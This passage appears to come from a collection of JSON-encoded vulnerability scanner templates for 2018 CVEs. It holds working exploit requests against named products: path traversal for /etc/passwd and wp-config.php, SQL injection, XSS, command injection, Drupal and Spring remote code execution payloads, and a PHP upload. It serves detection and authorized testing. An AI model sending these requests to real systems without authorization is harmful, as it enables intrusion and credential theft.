Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/_next/../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-13980","info":{"name":"Zeta Producer Desktop CMS <14.2.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16299","info":{"name":"WordPress Localize My Post 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-17153","info":{"name":"Western Digital MyCloud NAS - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /web/google_analytics.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nCookie: isAdmin=1; username=admin;\n\ncmd=set&opt=cloud-device-num&arg=0|echo%20`id`%20%23\n"],"matchers":[{"type":"dsl","dsl":["regex(\"uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)\", body)","contains(body, \"ganalytics\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2018-2791","info":{"name":"Oracle Fusion Middleware WebCenter Sites - Cross-Site Scripting","severity":"high"},"requests":[{"raw":["GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=qqq%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{BaseURL}}\n","GET /cs/Satellite?destpage=\"<h1xxx\"><script>alert(document.domain)</script>&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError HTTP/1.1\nHost: {{BaseURL}}\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>/graphics/common/screen/dotclear.gif"]},{"type":"word","part":"body","words":["<script>alert(24)</script>","Missing translation key"],"condition":"and"}]}]},{"id":"CVE-2018-14574","info":{"name":"Django - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}//www.interact.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Location: https://www.interact.sh","Location: http://www.interact.sh"]},{"type":"status","status":[301]}]}]},{"id":"CVE-2018-18069","info":{"name":"WordPress sitepress-multilingual-cms 3.6.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-admin/admin.php"],"body":"icl_post_action=save_theme_localization&locale_file_name_en=EN\"><script>alert(0);</script>\n","host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(tolower(header), \"text/html\")","contains(set_cookie, \"_icl_current_admin_language\")","contains(body, \"\\\"><script>alert(0);</script>\")"],"condition":"and"}]}]},{"id":"CVE-2018-5233","info":{"name":"Grav CMS <1.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/tools/a--%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"body","words":["/themes/grav","Grav Admin Login","data-grav-"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16670","info":{"name":"CirCarLife <4.3 - Improper Authentication","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/services/user/values.xml?var=STATUS"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["CirCarLife Scada"]},{"type":"word","part":"body","words":["<values><variable><id>","Reader.STATUS"],"condition":"and"}]}]},{"id":"CVE-2018-14474","info":{"name":"Orange Forum 1.4.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login?next=http://interact.sh/?app.scan/","{{BaseURL}}/signup?next=http://interact.sh/?app.scan/"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2018-19365","info":{"name":"Wowza Streaming Engine Manager 4.7.4.01 - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000600","info":{"name":"Jenkins GitHub Plugin <=1.29.1 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://{{interactsh-url}}"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2018-14013","info":{"name":"Synacor Zimbra Collaboration Suite Collaboration <8.8.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action=&cso=0&id=%22%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10735","info":{"name":"NagiosXI <= 5.4.12 `commandline.php` SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/nagiosql/admin/commandline.php?cname=%27%20union%20select%20concat(md5({{num}}))%23"],"matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]}]}]},{"id":"CVE-2018-11231","info":{"name":"Opencart Divido - Sql Injection","severity":"high"},"requests":[{"raw":["POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1\nHost: {{Hostname}}\n\n{\"metadata\":{\"order_id\":\"1 and updatexml(1,concat(0x7e,(SELECT md5({{num}})),0x7e),1)\"},\"status\":2}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11473","info":{"name":"Monstra CMS 3.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /users/registration HTTP/1.1\nHost: {{Hostname}}\n","POST /users/registration HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrf={{csrf}}&login=test&password=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&email=teest%40gmail.com&answer=test&register=Register\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script>","Monstra"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["id=\"csrf\" name=\"csrf\" value=\"(.*)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2018-7422","info":{"name":"WordPress Site Editor <=1.1.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php","{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd"],"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2018-14912","info":{"name":"cgit < 1.2.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7600","info":{"name":"Drupal - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1\nHost:  {{Hostname}}\nAccept: application/json\nReferer:  {{Hostname}}/user/register\nX-Requested-With: XMLHttpRequest\nContent-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663\n\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"mail[#post_render][]\"\n\npassthru\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"mail[#type]\"\n\nmarkup\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"mail[#markup]\"\n\ncat /etc/passwd\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"form_id\"\n\nuser_register_form\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"_drupal_ajax\"\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18925","info":{"name":"Gogs (Go Git Service) 0.11.66 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nCookie: lang=en-US; i_like_gogits=../../../../etc/passwd;\n","GET / HTTP/1.1\nHost: {{Hostname}}\nCookie: lang=en-US; i_like_gogits=../../../../etc/dummy;\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 500 && status_code_2 == 200 && contains(body_2, \"<meta name=\\\"author\\\" content=\\\"Gogs\\\" />\")"]}]}]},{"id":"CVE-2018-17246","info":{"name":"Kibana - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"message\":\"An internal server error occurred\""]},{"type":"word","part":"header","words":["kbn-name","kibana"],"case-insensitive":true,"condition":"or"},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2018-16139","info":{"name":"BIBLIOsoft BIBLIOpac 2008 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bibliopac/bin/wxis.exe/bibliopac/?IsisScript=bibliopac/bin/bibliopac.xic&db=\"><script>prompt(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>prompt(document.domain)</script>.xrf"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-15138","info":{"name":"LG-Ericsson iPECS NMS 30M - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data","{{BaseURL}}/ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16341","info":{"name":"Nuxeo <10.3 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/nuxeo/login.jsp/pwn${31333333330+7}.xhtml"],"matchers":[{"type":"word","part":"body","words":["31333333337"]}]}]},{"id":"CVE-2018-12613","info":{"name":"PhpMyAdmin <4.8.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-8727","info":{"name":"Mirasys DVMS Workstation <=5.12.6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini"],"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-1000856","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /segments/add.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&raw_domain_list=test.com&new_description=test&new_notes=test\n","GET /segments/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"host-redirects":true,"max-redirects":3,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(1)</script></a>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20985","info":{"name":"WordPress Payeezy Pay <=2.97 - Local File Inclusion","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-content/plugins/wp-payeezy-pay/donate.php"],"body":"x_login=../../../wp-config","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["The base configuration for WordPress","define( 'DB_NAME',","define( 'DB_PASSWORD',"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-9118","info":{"name":"WordPress 99 Robots WP Background Takeover Advertisements <=4.1.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD","DB_HOST","The base configurations of the WordPress"],"condition":"and"}]}]},{"id":"CVE-2018-7282","info":{"name":"TITool PrintMonitor - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}')+OR+4191=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(50000000/2))))--+vDwl&password={{password}}&language=en\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"PrintMonitor\") && contains(header, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2018-18608","info":{"name":"DedeCMS 5.7 SP2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/feedback.php/rp4hu%27><script>alert%28document.domain%29<%2fscript>?aid=3"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'><script>alert(document.domain)</script>","DedeCMS Error Warning!"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19892","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /admin/dw/add-server.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_host=abc&new_protocol=https&new_port=2086&new_username=abc&new_api_token=255&new_hash=&new_notes=\n","GET /admin/dw/servers.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":3,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script></a>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16133","info":{"name":"Cybrotech CyBroHttpServer 1.0.3 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET \\..\\..\\..\\..\\Windows\\win.ini HTTP/1.1\nHost: {{Hostname}}\n\n"],"unsafe":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-19915","info":{"name":"DomainMOD <=4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/host.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_host=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_notes=test\n","GET /assets/hosting.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"><script>alert(document.domain)</script></a>\")"],"condition":"and"}]}]},{"id":"CVE-2018-8719","info":{"name":"WordPress WP Security Audit Log 3.1.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/uploads/wp-security-audit-log/failed-logins/"],"matchers-condition":"and","matchers":[{"type":"word","words":["[TXT]",".log","Index of"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11759","info":{"name":"Apache Tomcat JK Connect <=1.2.44 - Manager Access","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jkstatus","{{BaseURL}}/jkstatus;"],"matchers-condition":"and","matchers":[{"type":"word","words":["JK Status Manager"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12296","info":{"name":"Seagate NAS OS 4.3.15.1 - Server Information Disclosure","severity":"high"},"requests":[{"raw":["POST /api/external/7.0/system.System.get_infos HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}\n"],"matchers":[{"type":"word","part":"body","words":["\"version\":","\"serial_number\":"],"condition":"and"}],"extractors":[{"type":"regex","group":1,"regex":["\"version\": \"([0-9.]+)\""],"part":"body"}]}]},{"id":"CVE-2018-14916","info":{"name":"Loytec LGATE-902 <6.4.2 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1273","info":{"name":"Spring Data Commons - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /account HTTP/1.1\nHost: {{Hostname}}\nConnection: close\nContent-Type: application/x-www-form-urlencoded\n\nname[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('{{url_encode(command)}}')]={{to_lower(rand_text_alpha(5))}}\n"],"payloads":{"command":["cat /etc/passwd","type C:\\/Windows\\/win.ini"]},"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"}]}]},{"id":"CVE-2018-10141","info":{"name":"Palo Alto Networks PAN-OS GlobalProtect <8.1.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/global-protect/login.esp?user=j%22;-alert(1)-%22x"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var valueUser = \"j\";-alert(1)-\"x\";"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20010","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/ssl-provider-account.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_ssl_provider_id=1&new_owner_id=1&new_email_address=&new_username=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_password=&new_reseller=0&new_reseller_id=&new_notes=\n","GET /assets/ssl-accounts.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"><script>alert(document.domain)</script></a>\")"],"condition":"and"}]}]},{"id":"CVE-2018-10823","info":{"name":"D-Link Routers - Remote Command Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-9161","info":{"name":"PrismaWEB - Credentials Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/user/scripts/login_par.js"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["txtChkUser","txtChkPassword"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-15517","info":{"name":"D-Link Central WifiManager - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/System/MailConnect/host/{{interactsh-url}}/port/80/secure/"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2018-20463","info":{"name":"WordPress JSmol2WP <=1.07 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'DB_USER',","'DB_PASSWORD'"],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-5715","info":{"name":"SugarCRM 3.5.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?action=Login&module=Users&print=a&%22%2F%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["&\"/><script>alert(1)</script>=&\"><< Back</a><br><br>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16671","info":{"name":"CirCarLife <4.3 - Improper Authentication","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/html/device-id"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["CirCarLife Scada"]},{"type":"word","part":"body","words":["circontrol"]},{"type":"regex","part":"body","regex":["(19|20)\\d\\d[- /.](0[1-9]|1[012])[- /.](0[1-9]|[12][0-9]|3[01])"]}]}]},{"id":"CVE-2018-7196","info":{"name":"osTicket < 1.10.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /scp/login.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(tolower(body), \"osticket\")"],"internal":true}],"extractors":[{"type":"regex","name":"csrftoken","part":"body","group":1,"regex":["__CSRFToken__\" value=\"(.*?)\""],"internal":true}]},{"raw":["POST /scp/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n__CSRFToken__={{csrftoken}}&do=scplogin&userid={{username}}&passwd={{password}}&ajax=1\n","GET /scp/index.php?sort=\"><script>alert(document.domain);</script>&dir=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"\\\"><script>alert(document.domain);</script>\")","contains(header, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2018-10201","info":{"name":"Ncomputing vSPace Pro 10 and 11 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini","{{BaseURL}}/...\\...\\...\\...\\...\\...\\...\\...\\...\\windows\\win.ini","{{BaseURL}}/..../..../..../..../..../..../..../..../..../windows/win.ini","{{BaseURL}}/....\\....\\....\\....\\....\\....\\....\\....\\....\\windows\\win.ini"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-19877","info":{"name":"Adiscon LogAnalyzer <4.1.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/src/login.php?referer=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\"><script>confirm(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18778","info":{"name":"ACME mini_httpd <1.30 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","part":"header","words":["Server: mini_httpd"],"internal":true}]},{"raw":["GET /etc/passwd HTTP/1.1\nHost:\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19287","info":{"name":"WordPress Ninja Forms <3.3.18 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?s&post_status=all&post_type=nf_sub&action=-1&form_id=1&nf_form_filter&begin_date=\"><img+src%3Dx+onerror%3Dalert%28document.domain%29%3B%2F%2F&end_date&filter_action=Filter&paged=1&action2=-1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["Begin Date\" value=\"\\\"><img src=x onerror=alert(document.domain);//\">"]},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000861","info":{"name":"Jenkins - Remote Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload;"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["package#vulntest"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10956","info":{"name":"IPConfigure Orchid Core VMS 2.0.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11409","info":{"name":"Splunk <=7.0.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json","{{BaseURL}}/__raw/services/server/info/server-info?output_mode=json"],"matchers-condition":"and","matchers":[{"type":"word","words":["licenseKeys"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20608","info":{"name":"Imcat 4.4 - Phpinfo Configuration","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/imcat/root/tools/adbug/binfo.php?phpinfo1"],"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"],"part":"body"}]}]},{"id":"CVE-2018-20526","info":{"name":"Roxy Fileman 1.4.5 - Unrestricted File Upload","severity":"critical"},"requests":[{"raw":["POST /php/upload.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary20kgW2hEKYaeF5iP\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\n\n------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"action\"\n\nupload\n------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"method\"\n\najax\n------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"d\"\n\n/Uploads\n------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"files[]\"; filename=\"{{randstr}}.php7\"\nContent-Type: application/octet-stream\n\n<?php\necho md5('CVE-2018-20526');\n?>\n\n------WebKitFormBoundary20kgW2hEKYaeF5iP--\n","GET /Uploads/{{randstr}}.php7 HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["f76d6a5f7491700cc3a678bdba2902d3"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18570","info":{"name":"Planon <Live Build 41 - 